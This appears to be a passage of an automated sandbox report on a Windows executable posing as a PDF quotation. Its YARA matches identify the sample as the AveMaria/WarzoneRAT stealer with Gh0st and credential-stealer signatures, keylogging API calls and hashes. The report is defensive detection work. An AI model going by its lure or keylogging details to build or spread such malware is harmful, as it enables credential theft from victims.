Code function: 3_2_00412776 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,CallNextHookEx,

3_2_00412776

Source: order_of_quotationpdf.exe, 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud

Yara detected AveMaria stealer

Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.728de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: order_of_quotationpdf.exe PID: 2956, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.3.order_of_quotationpdf.exe.718718.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.2.order_of_quotationpdf.exe.562070.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 3.3.order_of_quotationpdf.exe.715910.2.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 3.2.order_of_quotationpdf.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.37d6318.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.4749510.10.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.4749510.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 3.3.order_of_quotationpdf.exe.716ea8.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 3.3.order_of_quotationpdf.exe.718718.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.727100.3.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.37cd994.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 3.3.order_of_quotationpdf.exe.715910.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0.2.order_of_quotationpdf.exe.37cc124.3.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: order_of_quotationpdf.exe

Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_01AF157E	0_2_01AF157E
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_01AF25F8	0_2_01AF25F8
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_01AF26AA	0_2_01AF26AA
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_01AF1450	0_2_01AF1450
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_01AF1D3E	0_2_01AF1D3E
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_01AF1C48	0_2_01AF1C48
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_078CEA8C	0_2_078CEA8C
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_078C2090	0_2_078C2090
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 0_2_078F1F08	0_2_078F1F08
Source: C:\Users\user\Desktop\order_of_quotationpdf.exe	Code function: 3_2_00411A8E	3_2_00411A8E

Source: order_of_quotationpdf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3.3.order_of_quotationpdf.exe.718718.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.3.order_of_quotationpdf.exe.718718.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.order_of_quotationpdf.exe.562070.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.order_of_quotationpdf.exe.562070.0.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 3.2.order_of_quotationpdf.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.order_of_quotationpdf.exe.46f94f0.5.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth (Nextron Systems), description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
